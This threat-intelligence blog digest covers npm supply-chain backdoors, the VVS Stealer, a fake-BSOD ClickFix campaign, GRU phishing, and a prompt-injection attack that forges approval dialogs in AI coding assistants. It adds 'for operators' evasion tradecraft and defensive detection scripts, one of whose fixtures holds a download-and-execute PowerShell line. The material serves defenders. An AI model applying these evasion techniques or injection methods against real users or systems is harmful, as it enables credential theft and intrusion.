ZeroDay Field Notes - When Package Managers Become Trojan Horses and AI Safety Gets Weaponized

Offensive-focused notes on npm supply chain backdoors, Pyarmor stealth stealers, socially engineered RATs, GRU phishing, and weaponized AI safety.

UncleSp1d3r here. The first full week of 2026 brought yet another instance of a threat actor using an npm package for a supply chain attack. We've got npm packages deploying a Discord-controlled RAT and a backdoor that pulls its C2 config from the blockchain, a Python infostealer using Pyarmor BCC mode to hide in plain sight, and researchers demonstrating how to weaponize AI safety features to achieve RCE. The connecting thread? Every trust relationship is an attack surface, and the best evasion techniques are the ones that look exactly like legitimate operations.

Let's dig in.


Supply Chain Double Feature: npm Goes Full Cyberpunk

NeoShadow: When Your C2 Lives on the Blockchain

Aikido Security documented what might be the most Neuromancer-adjacent supply chain attack I've seen: NeoShadow, a multi-stage campaign that uses typosquatted npm packages (viem-js, cyrpto, tailwin, supabase-js) to deliver a sophisticated backdoor with Ethereum smart contract queries for C2 configuration.

The attack chain is a pro move in evasion layering:

  1. Typosquatting delivery: Packages masquerade as popular libraries with single-character typos
  2. JavaScript anti-analysis: Obfuscated loaders detect sandbox environments and delay execution
  3. Blockchain C2 config: Query Ethereum smart contract transaction memos for encrypted payloads (no DNS, no domains to sinkhole)
  4. MSBuild LOLBIN execution: Abuse MSBuild.exe inline tasks to compile and execute C# payloads
  6. APC injection: Inject into RuntimeBroker.exe so the payload runs inside a signed, always-present process
  6. ChaCha20/Curve25519 crypto: Modern encryption for C2 comms and credential exfiltration

The payload targets cryptocurrency wallets and browser extensions specifically, with a hardcoded list of 170+ high-value domains. The C2 infrastructure resolves to metrics-flow[.]com and 80.78.22[.]206, but the real resilience comes from the blockchain dead-drop mechanism--you can't take down an Ethereum address. We’ve talked a bit about this before with a few other intrusions, so I anticipate this is just going to be the norm going forward, especially for cryptocurrency-oriented campaigns.

For operators, the tradecraft worth studying:

  • Blockchain for C2 config: Immutable, censorship-resistant, and no DNS footprint. The downside is it's forever (hope you didn't leave any OPSEC mistakes in those transaction memos)
  • MSBuild inline tasks: Clean LOLBIN technique that compiles and runs arbitrary C# in memory; the only artifact on disk is the project file MSBuild.exe is pointed at, so there's no separate payload executable for AV to scan
  • APC injection into signed binaries: RuntimeBroker.exe is a perfect target--always running, signed by Microsoft, low user visibility. It's not one of the usual tools listed on LOLBAS (it's an injection target, not a LOLBIN), so it might draw a bit less attention.

For defenders, the mitigations are multi-layered:

  • Audit dependencies for the typosquatted packages (viem-js, cyrpto, tailwin, supabase-js)
  • Monitor MSBuild.exe executions with inline task parameters (especially from non-developer directories)
  • Detect APC injection into RuntimeBroker.exe (unusual thread creation patterns)
  • Block metrics-flow[.]com and 80.78.22[.]206
  • Monitor for Ethereum smart contract queries from build processes (yes, really)
  • Hunt for mutex GlobalNSV2_8e4b1d indicating active infection

The Aikido analysis includes file hashes, the Ethereum address, and a full technical breakdown. This is cutting-edge supply chain stuff: blockchain for infrastructure, a LOLBIN for execution, and crypto theft for monetization.

NodeCordRAT: Discord Bot or Backdoor? Yes.

Speaking of npm, Zscaler ThreatLabz caught three more typosquatted Bitcoin libraries (bitcoin-main-lib, bitcoin-lib-js, bip40) delivering NodeCordRAT, a Discord-controlled remote access trojan that specifically targets developer machines.

The infection flow is clean:

  1. Postinstall hook: Malicious code executes automatically when you npm install
  2. PM2 persistence: Installs PM2 process manager and registers the RAT as a persistent Node.js app
  3. Discord C2: Uses Discord API for command-and-control (free, encrypted, blends with legitimate dev traffic)
  4. Credential harvesting: Exfiltrates Chrome passwords, MetaMask wallet data, API tokens, .env files
  5. Host fingerprinting: Collects OS details, username, network config, and creates a Discord channel named after the victim's OS-UUID

The RAT's capabilities are standard but effective:

  • Command execution via Discord messages
  • File upload/download
  • Screen capture
  • Chrome/MetaMask credential theft
  • Environment variable exfiltration (looking for AWS keys, database passwords, API tokens)

Using Discord for C2 keeps getting more popular. It's free, the API is easy to work with, and the traffic is ordinary HTTPS to Discord's API, which plenty of developer machines already talk to. The PM2 persistence is a neat touch: PM2 is a legitimate Node.js process manager whose whole job is to keep apps running and bring them back after a crash or reboot, so the RAT survives reboots without the attacker dropping registry Run keys or a service of their own.

For operators:

  • Discord as C2: Reliable, free, and it fits right into developer environments. Just keep Discord's terms of service in mind, plus they will work with law enforcement. I’m not a fan of misusing a legit service for pentests and Red Teaming, so think about emulation or use it for inspiration instead.
  • PM2 for persistence: Legitimate Node.js process manager that blends with developer workflows
  • Postinstall hooks: Auto-execution on npm install requires zero user interaction

For defenders:

  • Remove bitcoin-main-lib, bitcoin-lib-js, bip40 from all projects and lockfiles immediately
  • Hunt for PM2 processes associated with bip40 or unknown apps
  • Block unauthorized Discord API traffic from build and dev environments
  • Deploy SCA tools to catch typosquatted packages
  • Rotate credentials stored in Chrome, MetaMask, and .env files on affected systems

The Zscaler report and corroborating coverage provide IOCs and behavioral indicators. Between NeoShadow and NodeCordRAT, npm is having a rough start to 2026.
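Both sections end with "audit your dependencies and lockfiles", so here is an added example (mine, not Aikido's or Zscaler's tooling) that audits an npm lockfile for the seven names above, for near-miss lookalikes of popular packages, and for anything npm has marked hasInstallScript, plus a check for install hooks in a single package.json. The lockfile, the watchlist of popular names, and the squatted package's postinstall script path are constructed for the example.

```python
import json

# Package names called out in the Aikido (NeoShadow) and Zscaler (NodeCordRAT) write-ups.
KNOWN_BAD = {"viem-js", "cyrpto", "tailwin", "supabase-js",
             "bitcoin-main-lib", "bitcoin-lib-js", "bip40"}

# Legitimate names the squats imitate. Illustrative watchlist (an assumption, not from the
# reports): seed it from your own dependency tree, not from this list.
WATCHLIST = {"viem", "crypto", "tailwindcss", "@supabase/supabase-js", "bitcoinjs-lib", "bip39"}

# npm lifecycle scripts that run automatically during install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus one adjacent
    transposition, so 'cyrpto' vs 'crypto' scores 1 instead of Levenshtein's 2."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lockfile_packages(lock: dict) -> dict:
    """Flatten an npm lockfile to {name: entry}. v2/v3 use 'packages' keyed by
    node_modules path (nested and scoped paths included); v1 uses 'dependencies'."""
    out = {}
    for path, entry in lock.get("packages", {}).items():
        if path:  # "" is the root project itself
            out[path.split("node_modules/")[-1]] = entry
    for name, entry in lock.get("dependencies", {}).items():
        out.setdefault(name, entry)
    return out


def install_hooks(pkg_json: dict) -> list:
    """Lifecycle hooks declared by one package.json (e.g. a dependency under node_modules)."""
    return [h for h in INSTALL_HOOKS if h in pkg_json.get("scripts", {})]


def audit(lock: dict) -> dict:
    """Flag known-bad names, near-miss lookalikes, and anything npm marked hasInstallScript."""
    findings = {"known_bad": [], "lookalike": [], "install_scripts": []}
    for name, entry in lockfile_packages(lock).items():
        if name in KNOWN_BAD:
            findings["known_bad"].append(name)
        else:
            for popular in sorted(WATCHLIST):
                if name != popular and osa_distance(name, popular) <= 2:
                    findings["lookalike"].append((name, popular))
        if entry.get("hasInstallScript"):  # npm sets this for packages with install hooks
            findings["install_scripts"].append(name)
    return findings


# Constructed lockfile (v3): one real-looking project with the squatted names mixed in.
LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/viem": {"version": "2.21.0"},
        "node_modules/cyrpto": {"version": "1.0.3", "hasInstallScript": True},
        "node_modules/bip40": {"version": "0.1.0", "hasInstallScript": True},
        "node_modules/bip93": {"version": "0.0.1"},
        "node_modules/esbuild": {"version": "0.21.5", "hasInstallScript": True},
    },
}

# Constructed package.json in the shape of a squatted package: the hook name is real npm
# behaviour, the script path is invented for the example.
SQUATTED_PKG = {"name": "bip40", "version": "0.1.0",
                "scripts": {"postinstall": "node ./lib/setup.js"}}

if __name__ == "__main__":
    print(json.dumps(audit(LOCK), indent=2))
    print("hooks in squatted package:", install_hooks(SQUATTED_PKG))
```

Note that esbuild lands in install_scripts too: that list is a review queue, not a verdict, because plenty of legitimate packages ship install hooks. The policy lever is the one from the NodeCordRAT bullet: run `npm ci --ignore-scripts` in CI and build environments and allowlist the handful of packages that genuinely need their hooks.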


Obfuscation Masterclass: VVS Stealer and Pyarmor BCC Mode

We've seen Python malware obfuscated with Pyarmor before, but VVS Stealer (also styled VVS $tealer) takes it further with Pyarmor BCC mode--a feature that converts Python functions to equivalent C functions compiled to machine code, then called by the obfuscated Python runtime.

The awesome team at Unit 42 did a fantastic analysis on reversing Pyarmor-protected malware. It's definitely worth a read just for the deobfuscation methods alone. The short version:

VVS Stealer is a Discord-targeting infostealer sold on Telegram since April 2025. It's distributed as a PyInstaller-packaged executable that:

  1. Establishes persistence via Windows Startup folder
  2. Harvests Discord tokens by pulling the DPAPI-protected master key out of the client's Local State file, unwrapping it with DPAPI, and using it to decrypt the tokens stored in the LevelDB database
  3. Steals browser credentials from Chrome, Edge, Firefox, Brave, Opera, Vivaldi, Yandex
  4. Hijacks Discord sessions by terminating the Discord client, injecting malicious JavaScript via Chrome DevTools Protocol, and intercepting network traffic for token theft
  5. Exfiltrates via Discord webhooks (because why not use your victim's platform for your C2)

The Pyarmor protection uses:

  • BCC mode: Python functions converted to C and compiled to native code stored in a separate ELF file
  • AES-128-CTR encryption: For both bytecode and string constants, with keys extracted from the Pyarmor runtime DLL
  • Obfuscated bytecode format: Custom marshaled bytecode with extra headers and encrypted sequences

The Unit 42 researchers successfully deobfuscated the sample by:

  1. Extracting the Pyarmor runtime DLL and bytecode from the PyInstaller package
  2. Locating AES keys and nonces in the runtime DLL (specific to the Pyarmor license number 007444)
  3. Decrypting bytecode sequences and string constants
  4. Mapping BCC function references back to their original Python logic

The result is a complete Python codebase that shows off the malware's abilities, C2 setup, and IOCs.

For operators:

  • Pyarmor BCC mode is a strong obfuscation layer that defeats most static analysis and AV signatures. The downside is that it gets complicated--debugging and making changes are tougher when your code's compiled to C.
  • Discord webhook exfiltration is trivial to implement and blends with legitimate traffic
  • Chrome DevTools Protocol injection is an underutilized technique for hijacking Electron apps (Discord, VS Code, Slack, etc.)

For defenders:

  • Monitor for Discord webhook creation and exfiltration patterns
  • Detect PyInstaller executables with Pyarmor runtime components (specific DLL names and version strings)
  • Block the documented webhook URLs (ptb.discord[.]com/api/webhooks/...)
  • Hunt for modifications to Discord application directories and JavaScript injection
  • Alert on suspicious files in the Windows Startup folder

The complete Unit 42 report has SHA-256 hashes, webhook URLs, and detailed deobfuscation steps. For malware analysts, it’s a case study on reverse engineering Pyarmor protection. For operators, it’s a guide to creating stealthy Python malware.
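To put the "detect PyInstaller executables with Pyarmor runtime components" bullet into practice, here is an added example (mine, not Unit 42's tooling) that walks the PyInstaller onefile table of contents and flags entries whose names or script bodies reference a Pyarmor runtime. The archive it scans is constructed in the block to the real CArchive layout; the pyarmor_runtime_000000 name and the script contents are illustrative assumptions, not VVS Stealer's actual entries.

```python
import struct
import zlib
from dataclasses import dataclass

# PyInstaller onefile cookie (PyInstaller >= 2.1): magic, package length, TOC offset,
# TOC length, Python version, 64-byte Python library name. All big-endian.
PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIII64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)        # 88
TOC_HEAD_FMT = "!IIIIBc"                          # entry len, offset, comp len, uncomp len, flag, type
TOC_HEAD_SIZE = struct.calcsize(TOC_HEAD_FMT)     # 18

# Pyarmor 8 ships its runtime as a package named pyarmor_runtime_<license id> and the
# protected script imports __pyarmor__ from it. Exact names per sample are an assumption,
# so match on fragments rather than a fixed filename.
PYARMOR_NAME_MARKERS = ("pyarmor_runtime", "pytransform")
PYARMOR_CODE_MARKERS = (b"__pyarmor__", b"pyarmor_runtime")


@dataclass
class Entry:
    name: str
    offset: int
    comp_len: int
    uncomp_len: int
    compressed: bool
    typ: str  # 's' script, 'b' binary, 'z' PYZ archive, 'x' data, 'm'/'M' module/package


@dataclass
class Archive:
    overlay: int   # file offset where the embedded package starts
    entries: list


def parse_archive(blob: bytes):
    """Find the trailing cookie and decode the table of contents; None if not PyInstaller."""
    pos = blob.rfind(PYINST_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(blob):
        return None
    _, pkg_len, toc_off, toc_len, _, _ = struct.unpack(COOKIE_FMT, blob[pos:pos + COOKIE_SIZE])
    overlay = pos + COOKIE_SIZE - pkg_len          # package length includes the cookie
    toc = blob[overlay + toc_off:overlay + toc_off + toc_len]
    entries, i = [], 0
    while i + TOC_HEAD_SIZE <= len(toc):
        elen, off, clen, ulen, flag, typ = struct.unpack(TOC_HEAD_FMT, toc[i:i + TOC_HEAD_SIZE])
        name = toc[i + TOC_HEAD_SIZE:i + elen].rstrip(b"\x00").decode("utf-8", "replace")
        entries.append(Entry(name, off, clen, ulen, bool(flag), typ.decode()))
        i += elen
    return Archive(overlay, entries)


def read_entry(blob: bytes, arc: Archive, e: Entry) -> bytes:
    raw = blob[arc.overlay + e.offset:arc.overlay + e.offset + e.comp_len]
    return zlib.decompress(raw) if e.compressed else raw


def pyarmor_indicators(blob: bytes) -> dict:
    """Entries whose names look like a Pyarmor runtime, and scripts that import one."""
    arc = parse_archive(blob)
    if arc is None:
        return {"pyinstaller": False, "name_hits": [], "script_hits": []}
    name_hits = [e.name for e in arc.entries
                 if any(m in e.name.lower() for m in PYARMOR_NAME_MARKERS)]
    script_hits = [e.name for e in arc.entries if e.typ == "s"
                   and any(m in read_entry(blob, arc, e) for m in PYARMOR_CODE_MARKERS)]
    return {"pyinstaller": True, "name_hits": name_hits, "script_hits": script_hits}


def build_fixture(entries) -> bytes:
    """Constructed onefile overlay: fake stub, zlib-compressed entries, TOC, cookie.
    The layout is the real CArchive format; the contents are invented test data."""
    data, toc = bytearray(), bytearray()
    for name, payload, typ in entries:
        comp = zlib.compress(payload)
        nm = name.encode() + b"\x00"
        toc += struct.pack(TOC_HEAD_FMT, TOC_HEAD_SIZE + len(nm), len(data),
                           len(comp), len(payload), 1, typ.encode()) + nm
        data += comp
    body = bytes(data) + bytes(toc)
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, len(body) + COOKIE_SIZE,
                         len(data), len(toc), 311, b"python311.dll")
    return b"MZ fake PE stub " + body + cookie


FAKE_PE = b"MZ\x90\x00" + b"\x00" * 28
PROTECTED_SAMPLE = build_fixture([
    ("pyiboot01_bootstrap", b"# bootstrap\n", "s"),
    ("stealer", b"from pyarmor_runtime_000000 import __pyarmor__\n"
                b"__pyarmor__(__name__, __file__, b'PY000000\\x00...')\n", "s"),
    ("pyarmor_runtime_000000\\pyarmor_runtime.pyd", FAKE_PE, "b"),
    ("python311.dll", FAKE_PE, "b"),
])
CLEAN_SAMPLE = build_fixture([
    ("pyiboot01_bootstrap", b"# bootstrap\n", "s"),
    ("app", b"print('hello')\n", "s"),
    ("python311.dll", FAKE_PE, "b"),
])

if __name__ == "__main__":
    print(pyarmor_indicators(PROTECTED_SAMPLE))
    print(pyarmor_indicators(CLEAN_SAMPLE))
```

Point pyarmor_indicators() at the bytes of a real sample to triage it. The scan uses rfind because on Authenticode-signed droppers the cookie still sits at the end of the overlay, just ahead of the signature blob. A hit on the runtime name alone is enough to route the sample to the Unit 42 style deobfuscation workflow instead of a generic PyInstaller decompiler, which will choke on the encrypted bytecode.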


When LOLBINs and Social Engineering Collide: PHALT#BLYX

Securonix documented a campaign targeting European hospitality with a novel twist on the ClickFix technique: PHALT#BLYX uses fake Blue Screen of Death (BSOD) pages to trick users into executing PowerShell commands that deliver DCRat (DarkCrystal RAT) via MSBuild.exe.

The attack chain:

  1. Phishing: Fake Booking.com emails with embedded links
  2. Fake BSOD: Victim is redirected to a page displaying a fake BSOD with a "fix" button
  3. ClickFix payload: The button copies a PowerShell command to the victim's clipboard and instructs them to paste it into the Windows Run dialog.
  4. PowerShell dropper: Downloads and executes our old friend MSBuild.exe with a malicious inline task
  5. MSBuild execution: Compiles and executes C# code that performs process hollowing on aspnet_compiler.exe
  6. DCRat deployment: Full RAT features like keylogging, reverse shell, and running secondary payloads in memory (like cryptocurrency miners).
  7. Persistence: .url file in Startup folder

The social engineering is solid--fake BSOD pages work because users are conditioned to panic at system errors and follow whatever "fix" is in front of them. The technical execution is even better: MSBuild.exe is a signed Microsoft binary that makes a perfect LOLBIN for malware delivery, and hollowing aspnet_compiler.exe means the payload runs under the name and signature of another Microsoft binary, which is enough to slip past detections keyed on process name or signer.

For operators:

  • ClickFix + fake error pages is an effective social engineering combo against non-technical users, and it makes for a great training opportunity in the after-action.
  • MSBuild inline tasks execute arbitrary C# without touching disk (similar to NeoShadow)
  • Process hollowing of signed binaries like aspnet_compiler.exe maintains stealth

For defenders:

  • Educate users about ClickFix tactics (never paste script code into Run dialogs)
  • Monitor MSBuild.exe executions from non-standard directories (%ProgramData%, %TEMP%)
  • Detect process hollowing of aspnet_compiler.exe (memory allocation patterns, unexpected network activity)
  • Alert on .url file creation in Startup folders
  • Enable PowerShell Script Block Logging (Event ID 4104)

The Securonix report includes IOCs, C2 domains, and MITRE ATT&CK mappings. The campaign is ongoing and specifically targets hospitality, likely due to the industry's reliance on booking platforms and lower security awareness.
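The MSBuild and ClickFix bullets above, together with the RuntimeBroker.exe injection hunt from the NeoShadow section, reduce to a handful of process-tree and remote-thread rules. The following is an added example (not from Securonix or Aikido) that runs those rules over constructed Sysmon-style records; the file paths, the example.invalid URL, and the benign-source allowlist are assumptions for the demo.

```python
# Sysmon-style records constructed for the example: EventID 1 = process creation,
# EventID 8 = CreateRemoteThread. Field names are Sysmon's; paths and the URL are invented.
EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "irm https://example.invalid/fix | iex"'},
    {"RecordId": 2, "EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"MSBuild.exe C:\ProgramData\Fix\update.xml"},
    {"RecordId": 3, "EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"aspnet_compiler.exe"},
    {"RecordId": 4, "EventID": 1,   # a developer's normal build, should stay quiet
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"RecordId": 5, "EventID": 8,
     "SourceImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "TargetImage": r"C:\Windows\System32\RuntimeBroker.exe"},
    {"RecordId": 6, "EventID": 8,   # routine OS-internal thread, should stay quiet
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\RuntimeBroker.exe"},
]

STAGING_DIRS = ("\\programdata\\", "\\temp\\", "\\appdata\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
HOLLOW_TARGETS = {"aspnet_compiler.exe"}            # signed binary PHALT#BLYX hollows
INJECT_TARGETS = {"runtimebroker.exe"}              # NeoShadow's APC injection target
BENIGN_THREAD_SOURCES = {"csrss.exe"}               # assumption: seed from your own baseline
CLICKFIX_TOKENS = ("-w hidden", "-windowstyle hidden", "-enc", "iex", "invoke-expression",
                   "irm ", "iwr ", "downloadstring")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Rule names that fire for one record."""
    hits = []
    if ev["EventID"] == 1:
        img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cmd = ev["CommandLine"].lower()
        if img == "msbuild.exe":
            if any(d in cmd for d in STAGING_DIRS):
                hits.append("msbuild_project_in_staging_dir")
            if parent in SCRIPT_HOSTS:
                hits.append("msbuild_spawned_by_script_host")
        if parent == "msbuild.exe" and img in HOLLOW_TARGETS:
            hits.append("msbuild_spawned_hollowing_target")
        # Run-dialog launches have explorer.exe as parent; two or more hide/download
        # tokens in one command line is the ClickFix signature.
        if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                and sum(t in cmd for t in CLICKFIX_TOKENS) >= 2:
            hits.append("clickfix_run_dialog_powershell")
    elif ev["EventID"] == 8:
        src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
        if tgt in INJECT_TARGETS and src not in BENIGN_THREAD_SOURCES:
            hits.append("remote_thread_into_" + tgt[:-4])
    return hits


def hunt(events) -> list:
    return [(ev["RecordId"], rule) for ev in events for rule in evaluate(ev)]


if __name__ == "__main__":
    for record_id, rule in hunt(EVENTS):
        print(f"record {record_id}: {rule}")
```

Records 2, 3 and 5 chain together into the full MSBuild story (script host spawns MSBuild on a project in ProgramData, MSBuild spawns the hollowing target, MSBuild opens a thread in RuntimeBroker), which is the kind of multi-rule correlation worth alerting on even when each rule alone is noisy in a developer-heavy fleet. Record 4 shows why the parent and project path matter: MSBuild.exe itself lives in a legitimate directory in every one of these events.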


APT Corner: BlueDelta's Credential Harvesting Evolution

Recorded Future's Insikt Group documented the evolution of BlueDelta (GRU-linked APT28/Fancy Bear) credential-harvesting operations in 2025. The campaign sets up themed phishing sites (like Microsoft OWA, Google, and Sophos VPN) on free web services and tunneling networks to snag credentials and MFA codes from targets in government, energy, and think tanks.

The attack flow:

  1. PDF-based phishing: Emails with fake account verification or password reset notices
  2. Multi-stage redirection: PDF contains links that redirect through shorteners and free hosting services
  3. Phishing portals: Fake login pages that mimic OWA, Google, or Sophos VPN
  4. Credential capture: JavaScript-driven form submissions exfiltrate credentials and MFA codes
  5. Disposable infrastructure: Free hosting (InfinityFree, Byet Internet Services), tunneling (ngrok, Webhook.site), URL shorteners (ShortURL)

The tradecraft evolution is notable:

  • Free hosting/tunneling: Disposable infrastructure that's harder to attribute and doesn't require paid domains
  • Multi-stage redirects: Breaks static analysis and makes blocking harder
  • MFA code theft: Phishing portals capture one-time codes in real-time

For operators:

  • Free web services provide operational flexibility and complicate attribution. Just like with Discord, keep the terms of service in mind and don’t mess it up for everyone.
  • Multi-stage redirects evade URL scanning and make takedowns slower
  • Culturally relevant lures (tax notices, government comms) improve success rates

For defenders:

  • Block or tightly control access to free hosting/tunneling services (Webhook.site, ngrok, etc.)
  • Monitor for PDF attachments with embedded links to shorteners
  • Enforce phishing-resistant MFA (FIDO2, hardware tokens) instead of SMS/TOTP
  • Alert on authentication from tunneling services and nonstandard ports
  • Block known BlueDelta domains and IPs (documented in the Recorded Future report)

BlueDelta's shift from hacked routers in past campaigns to free web infrastructure shows they're evolving. The report has tons of IOCs and MITRE ATT&CK mappings that fit perfectly for SIEM integration. I guess I’ll have to rock my FancyBear t-shirt that KryptoKat got me as a nod to GRU getting called out in the report.
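The "PDF attachments with embedded links to shorteners" bullet is easy to automate. Here is an added example (not from the Recorded Future report) that pulls /URI targets out of PDF link annotations, both literal and hex-encoded strings, and classifies the hostnames against shortener and free-hosting/tunnel suffixes. The suffix lists are my assumptions for the providers the report names, and the PDF fragment and its domains are constructed.

```python
import re
from urllib.parse import urlsplit

# Providers named in the Recorded Future report, mapped to hostname suffixes. The exact
# suffixes are an assumption (these services hand out several); extend from your own telemetry.
SHORTENERS = ("shorturl.at",)
FREE_HOSTS = ("rf.gd", "epizy.com", "great-site.net",       # InfinityFree
              "byethost.com", "byethost7.com",              # Byet Internet Services
              "ngrok.io", "ngrok-free.app", "ngrok.app",    # ngrok tunnels
              "webhook.site")

# PDF link annotations carry the target as /URI (literal string) or /URI <hex string>.
URI_RE = re.compile(rb"/URI\s*(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)")


def _matches(host: str, suffixes) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def extract_uris(pdf: bytes) -> list:
    """All /URI targets in an uncompressed PDF, hex strings decoded."""
    uris = []
    for m in URI_RE.finditer(pdf):
        tok = m.group(1)
        if tok.startswith(b"<"):
            raw = bytes.fromhex(tok[1:-1].decode("ascii"))
        else:  # undo the three escapes that matter for URLs; octal escapes are left alone
            raw = tok[1:-1].replace(b"\\(", b"(").replace(b"\\)", b")").replace(b"\\\\", b"\\")
        uris.append(raw.decode("latin-1"))
    return uris


def classify(url: str) -> str:
    host = (urlsplit(url).hostname or "").lower()
    if _matches(host, SHORTENERS):
        return "shortener"
    if _matches(host, FREE_HOSTS):
        return "free_hosting_or_tunnel"
    return "other"


def triage(pdf: bytes) -> list:
    return [(u, classify(u)) for u in extract_uris(pdf)]


def needs_detonation(pdf: bytes) -> bool:
    """Anything pointing at a shortener or disposable host deserves a sandbox run,
    since the interesting redirect chain only unfolds at click time."""
    return any(cls != "other" for _, cls in triage(pdf))


# Constructed PDF fragment: three Link annotations, one hex-encoded the way a lure might
# hide it from a naive string search. Domains are invented or illustrative.
HEX_LINK = "https://owa-verify.rf.gd/login".encode().hex().encode()
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://shorturl.at/abc12) >> >> endobj\n"
    b"2 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI <" + HEX_LINK + b"> >> >> endobj\n"
    b"3 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://www.microsoft.com/) >> >> endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    for url, cls in triage(SAMPLE_PDF):
        print(f"{cls:24} {url}")
    print("detonate:", needs_detonation(SAMPLE_PDF))
```

Real attachments usually keep annotations inside compressed object streams, so flatten first (for example `qpdf --qdf --object-streams=disable in.pdf out.pdf`) before handing the bytes to triage(). The classifier only sees the first hop; the multi-stage redirect chain the report describes is exactly what the sandbox run is for.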


Bonus Round: Weaponizing AI Safety Features

Checkmarx documented a novel attack called Lies-in-the-Loop (LITL) that weaponizes Human-in-the-Loop (HITL) safety dialogs in AI coding assistants like Claude Code and Copilot Chat to achieve remote code execution.

The technique:

  1. Indirect prompt injection: Attacker-controlled content (GitHub repo, web page) contains malicious instructions
  2. HITL dialog forging: The AI assistant generates a safety dialog asking for user approval, but the dialog content is manipulated by the prompt injection
  3. User approval: Victim approves the forged dialog, believing it's legitimate
  4. RCE execution: The AI executes the attacker's command (file operations, network requests, arbitrary code)

The attack gets around the OWASP-recommended HITL safeguards by using the approval dialog as an injection point. Checkmarx showed PoCs that achieved RCE on both Claude Code and Copilot Chat. Anthropic and Microsoft both said these issues aren't vulnerabilities; they called them "informative" findings about the basic prompt injection problem.

For operators:

  • Indirect prompt injection remains unsolved across the AI industry
  • HITL dialog forging demonstrates that safety features can become attack surfaces
  • AI coding assistants are high-value targets due to developer trust and privileged access

For defenders:

  • Implement distinct UI styling for HITL dialogs to help users identify tampering
  • Validate and sanitize all external input before rendering in conversations
  • Run agents in sandboxed environments where feasible
  • Educate users about LITL risks and encourage scrutiny of approval dialogs

Honestly, most of the fixes for this are aimed at AI tool developers. It’s kind of a mix between a ClickFix and a doppelganger attack, so the solutions for SOCs and security teams are pretty similar. The Checkmarx report has PoC demos and defensive tips. Even though vendors don’t see this as a CVE-worthy issue, it’s a real attack method that can hit actual deployments. As a hacker at heart, I’m excited about this new world of AI attacks. It’s like the link between social engineering and traditional exploitation, but now you’re social engineering the machine. It'll be interesting to watch and a pain to deal with.


Closing Thoughts: Every Trust Relationship Is an Attack Surface

I know I sound like a broken record (man, that reference shows my age), but this week's stories have a common theme: the best attacks take advantage of the stuff we trust completely. npm packages run as soon as you install them. Discord accounts stash tokens in easy-to-find spots. MSBuild.exe is a signed Microsoft file. AI coding helpers pop up safety dialogs that users just click through without thinking.

The basics of defense are still the same--check your dependencies, watch for strange behavior, stick to the least privilege, and educate users--but we need to sharpen our focus. You can’t just trust a package because it’s on npm or let a binary run just because Microsoft signed it. Context is key. Baselines are important. Behavioral detection is way more crucial than signatures.

For operators, the message is clear: the best tactics blend in with legit operations. Use blockchain for C2 infrastructure. Take advantage of LOLBINs for execution. Hit developers when they’re not paying attention. And use safety features as weapons when you can.

So, check your npm dependencies, look over your AI assistant permissions, and maybe spend some time tracking down MSBuild.exe executions from strange directories. The bad guys are already plotting for Q1 2026, and the attack surface keeps getting bigger.

Stay sharp. The supply chain never sleeps.

-- UncleSp1d3r

Hey there! Just a heads up: we’ve been trying out automated style checking with vale to make our content easier to read. But honestly, it’s starting to sound less like us and keeps getting flagged as AI-generated. So, we’re switching back to a more relaxed writing style. If using idioms and casual grammar makes it harder for anyone to understand, please let us know. We really want to keep this useful for everyone!